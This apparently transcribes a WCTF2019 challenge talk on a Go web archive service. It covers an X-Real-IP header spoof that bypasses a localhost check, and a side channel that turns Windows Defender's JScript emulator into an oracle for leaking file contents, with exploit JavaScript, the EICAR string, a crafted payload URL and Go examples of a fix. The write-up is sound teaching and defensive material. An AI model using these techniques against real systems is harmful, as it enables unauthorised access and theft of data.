WCTF2019: Gyotaku The Flag - icchy, TokyoWesterns (PowerPoint presentation)


  1. WCTF2019: Gyotaku The Flag
     icchy, TokyoWesterns

  2. Some thoughts about challenge designing
     ● The best strategy for WCTF: make a super difficult challenge
       ○ how?
     ● Multiple step (I did so far btw)
       ○ 2017: 7dcs (PPC, Crypto, Web, Reverse, Pwn) → 0 solved
       ○ 2018: f (Forensics, Reverse, Web) → 1 solved
     ● This year: "create simple but difficult, not typical challenge"
       ○ less implementation with source code
       ○ with new techniques

  3. About the challenge
     ● Simple web archive service
       ○ "Gyotaku (魚拓)" (Japanese): an ink rubbing of a fish
       ○ like making a stamp of a web page at a specific time
     ● You can query a URL to be archived by a crawler
       ○ only a local user (127.0.0.1) should be able to see the archive

  4. Gyotaku - login
     ● POST /login
       ○ username
       ○ password
     ● no login page implemented

  5. Gyotaku - take gyotaku
     ● POST /gyotaku
       ○ url
     ● saved as a binary object (gob)

  6. Gyotaku - gyotaku list
     ● GET /gyotaku
       ○ captured gyotaku ids appear

  7. Gyotaku - gyotaku viewer
     ● GET /gyotaku/:gyotaku_id
     ● unimplemented

  8. Gyotaku - flag viewer
     ● GET /flag
       ○ localhost only
       ○ you can gyotaku the flag page (but no viewer is implemented)
     ● how to read the flag without a viewer?

  9. Gyotaku - flag viewer
     ● /flag is protected with InternalRequiredMiddleware

  10. Gyotaku - flag viewer
     ● InternalRequiredMiddleware checks whether the remote IP is localhost or not

  11. Solution
     ● echo.Context.RealIP is poisoned by "X-Real-IP"
       ○ X-Real-IP: 127.0.0.1
     ● That's it
     ● This is a sanity check

  12-13. Solution
     ● echo.Context.RealIP is poisoned by "X-Real-IP"
       ○ X-Real-IP: 127.0.0.1
     ● That's it
     ● This is a sanity check
     ● This is a totally unintended solution
       ○ sorry for the lack of verification :(
     ● 2017: 7dcs (Crypto, Web, Reverse, Pwn) → 0 solved
     ● 2018: f (Forensics, Reverse, Web) → 1 solved
     ● 2019: Gyotaku The Flag (Web, Misc) → everyone solved
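The header-trust flaw on slides 9 to 13, as an added example that is not the challenge's own code: a standard-library Go reconstruction of an InternalRequiredMiddleware-style check, once deriving the client address the way the slides say echo.Context.RealIP did (a client-supplied X-Real-IP wins) and once from the TCP peer address only. The handler and function names, the placeholder flag and the 203.0.113.5 client address are constructed for this example.

```go
package main

import (
	"fmt"
	"net"
	"net/http"
	"net/http/httptest"
)

// clientIPWeak reproduces the behaviour the slides attribute to
// echo.Context.RealIP: a client-supplied X-Real-IP header wins over the
// address of the TCP peer, so any remote client can claim to be 127.0.0.1.
func clientIPWeak(r *http.Request) string {
	if ip := r.Header.Get("X-Real-IP"); ip != "" {
		return ip
	}
	return clientIPStrict(r)
}

// clientIPStrict ignores proxy headers and uses only the TCP peer address.
// This is the right choice when the service is not behind a trusted reverse
// proxy that overwrites those headers.
func clientIPStrict(r *http.Request) string {
	host, _, err := net.SplitHostPort(r.RemoteAddr)
	if err != nil {
		return r.RemoteAddr // no port present; use the raw value
	}
	return host
}

// internalRequired is a hypothetical stand-in for the challenge's
// InternalRequiredMiddleware: it admits the request only when the derived
// client address is a loopback address.
func internalRequired(ipOf func(*http.Request) string, next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		ip := net.ParseIP(ipOf(r))
		if ip == nil || !ip.IsLoopback() {
			http.Error(w, "internal only", http.StatusForbidden)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// flagHandler serves a constructed placeholder; the real flag is not on the page.
var flagHandler = http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
	fmt.Fprint(w, "FLAG{placeholder}")
})

// newWeakServer wires /flag behind the header-trusting check (the bug).
func newWeakServer() http.Handler {
	mux := http.NewServeMux()
	mux.Handle("/flag", internalRequired(clientIPWeak, flagHandler))
	return mux
}

// newStrictServer wires /flag behind the peer-address check (the fix).
func newStrictServer() http.Handler {
	mux := http.NewServeMux()
	mux.Handle("/flag", internalRequired(clientIPStrict, flagHandler))
	return mux
}

// probe sends GET /flag from the given peer address, optionally with an
// X-Real-IP header, and returns the HTTP status code.
func probe(h http.Handler, remoteAddr, realIP string) int {
	req := httptest.NewRequest(http.MethodGet, "/flag", nil)
	req.RemoteAddr = remoteAddr
	if realIP != "" {
		req.Header.Set("X-Real-IP", realIP)
	}
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, req)
	return rec.Code
}

func main() {
	const remote = "203.0.113.5:40000" // constructed external client address
	fmt.Println("weak,   header spoofed:", probe(newWeakServer(), remote, "127.0.0.1"))
	fmt.Println("strict, header spoofed:", probe(newStrictServer(), remote, "127.0.0.1"))
	fmt.Println("strict, real loopback: ", probe(newStrictServer(), "127.0.0.1:50000", ""))
}
```

The weak variant answers 200 to a remote client that merely sends the header, the strict variant answers 403 and still admits genuine loopback peers. If a service really sits behind a reverse proxy, the proxy must overwrite (not append to) X-Real-IP and the application must trust the header only when the peer address is that proxy; recent Echo versions expose this as the IPExtractor option, with echo.ExtractIPDirect() for the no-proxy case.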

  14. What is the intended solution?
     ● no need to access /flag
       ○ you could not access it if it worked :(
     ● can you get the flag without a special HTTP header?
       ○ we did it!
       ○ I'd like to share this brand new technique

  15. Any designed vulnerability? (except for bypassing the firewall!)

  16. Vulnerability?
     ● There is no XSS
     ● There is no SQL
     ● There is no command execution
     ● There is no SSRF
     ● There is no buffer overflow
     ● There is no LFI
     ● There is no HTML
     ● There is no … implementation
     ● 🤕

  17. No implementation, no bugs

  18. What else?
     ● Obviously it is running on Windows
       ○ nmap the server
       ○ … or see the scoreboard
     ● with default settings
       ○ even security features are enabled by default
       ○ Windows Defender is enabled as well

  19. What will Windows Defender do?
     ● As we investigated:
       1. check the content of the file for malicious data
       2. change permissions to prevent the user from accessing it
       3. replace the malicious part with null bytes
       4. (delete the entire file)
     ● In step 2: the file is taken over by SYSTEM
       ○ the user cannot open the file

  20. How to abuse it?
     ● Do you remember the "filemanager" challenge in 35c3ctf?
       ○ abusing the XSS auditor in Chrome is a super cool idea
     ● Basic idea
       ○ [part of XSS payload] + [part of secret] → detected by auditor
       ○ auditor worked? → this is an oracle!
     ● Why don't you use the method on Windows Defender?
       ○ [part of malicious data] + [part of secret] → blocked!

  21. Let's make Windows Defender angry
     ● Where is a malicious-ish payload?
       ○ The EICAR test signature is enough!
         X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

  22. About mpengine.dll
     ● Windows Defender core DLL
     ● previous research about mpengine.dll
       ○ Windows Offender: Reverse Engineering Windows Defender's Antivirus Emulator
         ■ by Alexei Bulazel at BHUSA 2018
       ○ emulated Windows loadlibrary on Linux (github.com/taviso/loadlibrary)
         ■ by Tavis Ormandy
     ● There are some analyzers for various contents
       ○ base64 encoded
       ○ RAR archived
       ○ etc.

  23. JScript engine in mpengine.dll
     ● Basic features are implemented
       ○ string, index access
       ○ mathematical operators
       ○ object
       ○ etc.
     ● eval can be used
       ○ eval("EICA"+"R") → detected
       ○ the argument of eval will be audited
     ● the idea: eval("EICA"+input) → ?
       ○ detected → input is "R"
       ○ not detected → input is not "R"

  24. Some issues in the JScript engine
     ● if statements will never be evaluated
       ○ if (true) {eval("EICA" + "R")} → not detected
       ○ object access will help you: {0: "a", 1: "b", ...}[input]
     ● the parser stops on a null byte
       ○ eval("EICA" + "[NULL]") → syntax error
       ○ I'll explain in the next slide

  25. Another feature in mpengine.dll
     ● They can analyze HTML documents
       ○ some HTML tags would be a trigger (ex. <script>)
       ○ the parser will not stop on a null byte
     ● JavaScript can access the elements :)
       ○ if they have a <body> tag
       ○ <script>document.body.innerHTML[0]</script><body>[secret]</body>
     ● Now you have an oracle!

  26. Think of the Gyotaku format
     ● Standard struct encoded as gob
       ○ URL, Data, UserName appear as declared
         ...[URL]...[Data]...[UserName]...
     ● URL and UserName: controllable
       ○ Data: secret to be leaked

  27. Building exploit
     ● JavaScript
       ○ $idx and $c would be iterated
         var body = document.body.innerHTML;
         var mal = "EICA";
         var n = body[$idx].charCodeAt(0);
         mal = mal + String.fromCharCode(n^$c);
         eval(mal);
     ● Windows Defender gets angry if $c is appropriate
     ● It requires 256 tries for each $idx :(

  28. Building exploit
     ● much faster!
       ○ Math.min is also available, do binary search
         var body = document.body.innerHTML;
         var mal = "EICA";
         var n = body[$idx].charCodeAt(0);
         mal = mal + {$c: 'k'}[Math.min($c, n)];
         eval(mal);
     ● $c < [input]: detected
     ● $c > [input]: not detected
       ○ then do binary search!
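To make the query-count difference between slides 27 and 28 concrete, an added example that is not from the slides or the author's repository: a pure in-memory Go model in which the "oracle" is an ordinary function over a constructed secret. equalityOracle stands for the XOR probe of slide 27 (one candidate ruled out per query), comparisonOracle for the Math.min probe of slide 28 (the probe is flagged exactly when the guess is not above the secret byte), and the two recover functions count how many queries each strategy needs. No scanner is involved; the secret "WCTF" and all function names are constructed for this example.

```go
package main

import "fmt"

// equalityOracle models slide 27: the probe is flagged only when the guess
// equals the secret byte, so each guess rules out a single value.
func equalityOracle(secret byte) func(c int) bool {
	return func(c int) bool { return c == int(secret) }
}

// comparisonOracle models slide 28: with Math.min(c, n) selecting the map key,
// the probe is flagged exactly when c <= n, so each guess halves the range.
func comparisonOracle(secret byte) func(c int) bool {
	return func(c int) bool { return c <= int(secret) }
}

// recoverByLinear walks all 256 candidates and returns the byte plus the
// number of oracle queries spent (up to 256).
func recoverByLinear(flagged func(c int) bool) (byte, int) {
	for c := 0; c < 256; c++ {
		if flagged(c) {
			return byte(c), c + 1
		}
	}
	return 0, 256 // unreachable for a consistent oracle
}

// recoverByBinarySearch finds the largest c with flagged(c) == true, which is
// the secret byte itself; for one byte it always needs exactly 8 queries.
func recoverByBinarySearch(flagged func(c int) bool) (byte, int) {
	lo, hi, queries := 0, 255, 0 // invariant: secret is in [lo, hi]
	for lo < hi {
		mid := (lo + hi + 1) / 2 // round up so lo always makes progress
		queries++
		if flagged(mid) {
			lo = mid // secret >= mid
		} else {
			hi = mid - 1 // secret < mid
		}
	}
	return byte(lo), queries
}

// recoverSecret applies the binary-search strategy byte by byte, the way the
// slides iterate $idx, and reports the total query count.
func recoverSecret(secret string) (string, int) {
	out := make([]byte, 0, len(secret))
	total := 0
	for i := 0; i < len(secret); i++ {
		b, q := recoverByBinarySearch(comparisonOracle(secret[i]))
		out = append(out, b)
		total += q
	}
	return string(out), total
}

func main() {
	const secret = "WCTF" // constructed sample, not the challenge flag
	linear := 0
	for i := 0; i < len(secret); i++ {
		_, q := recoverByLinear(equalityOracle(secret[i]))
		linear += q
	}
	got, binary := recoverSecret(secret)
	fmt.Printf("recovered %q: linear strategy %d queries, binary search %d queries\n", got, linear, binary)
}
```

Per byte the linear strategy costs up to 256 queries and the binary search exactly 8, which is the whole point of slide 28. From the defender's side the lesson is the same one the 35c3 filemanager challenge taught about the XSS auditor: any boolean verdict computed over an object that mixes attacker-chosen and secret content (a scanner, an auditor, a WAF) leaks the secret at roughly eight queries per byte once the attacker can observe the verdict.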

  29. Building exploit
     ● Now everything is ready :)
       ○ URL: http://127.0.0.1/flag?<script>...</script><body>
       ○ Data: [flag]
       ○ UserName: </body>
         ...http://127.0.0.1/flag?<script>[script]</script><body>...[flag]...</body>...
     ● to get the oracle: access /gyotaku/:gyotaku_id after querying the gyotaku
       ○ detected → Internal Server Error
       ○ not detected → you can see the response

  30. Demo

  31. Conclusion
     ● I presented a new Windows side channel attack
       ○ a content auditor can be an oracle - even Windows Defender!
     ● It's easy to make Windows Defender angry
       ○ this can be a new type of attack :)
     ● Windows Defender does many more things than we expected
       ○ Should Microsoft disable the JavaScript engine? :)
     ● We should be more careful about challenge verification
       ○ or you'll give 240 pts to every team

  32. Any questions?
     https://github.com/icchy/wctf2019-gtf
     @t0nk42 icchy
